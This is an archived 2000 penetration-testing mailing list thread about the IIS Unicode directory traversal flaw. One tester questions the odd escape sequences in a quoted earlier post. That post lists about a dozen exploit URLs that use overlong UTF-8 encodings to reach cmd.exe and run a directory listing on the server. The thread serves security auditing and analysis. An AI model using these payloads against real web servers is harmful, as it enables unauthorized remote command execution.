Penetration Testing mailing list archives
Re: [PEN-TEST] IIS UNICODE Strings
From: Vitaly Osipov <vos () TELENOR CZ>
Date: Tue, 31 Oct 2000 21:19:53 +0100
Hmm... I see some *very* strange strings in you examples below, namely those:
http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+d ir+c:\
the second excaped symbol (%pc for example) is not real escaped hex-code - if it works, then the problem is not in Unicode at all, but in something else - maybe IIS interperts anything which is after 0xc1, 0xc0 in some special way? something like %9v -> 9*0x10+(code for "v" - code for "a") = 0x90 +0x16 = 0xa6? If I have some time tomorrow, I'll try to dissassemble that dll of IIS which was patched my microsoft and extract a real decoding algorithm from there... or maybe OI do not understand something obvious regarding unicode :-S regards, Vitaly. ----- Original Message ----- From: "Mike Ahern" <mc_ahern () YAHOO COM> To: <PEN-TEST () SECURITYFOCUS COM> Sent: Friday, October 27, 2000 9:35 PM Subject: [PEN-TEST] IIS UNICODE Strings
I have been trying to track the various strings when I find them, and here is a list so far. I have tested many of these and found many to work on systems I am authorized to audit. Initial reports seemed to indicate that this was predominately a foreign (non US English) web server problem, however I have found that there are many vulnerable US English servers. In initial tests I found one non-US web site and three US web sites vulnerable for a single client. That made me wonder how many internal file & print, exchange, sql, and other servers with IIS installed were vulnerable within the network. In my testing I have found a good number of internal US servers vulnerable as well. Certainly not the majority, but fairly well represented anyhow. I suspect this is a partial list of UNICODE strings... Happy Testing... -mch
http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+d ir+c:\
http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/ c+dir+c:\
http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+dir+c:\
http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd .exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+dir+c:\
__________________________________________________ Do You Yahoo!? Yahoo! Messenger - Talk while you surf! It's FREE. http://im.yahoo.com/
Current thread:
- Re: [PEN-TEST] IIS UNICODE Strings Marco (Nov 01)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Vitaly Osipov (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Unicraft Systems (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Moonen, Ralph (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)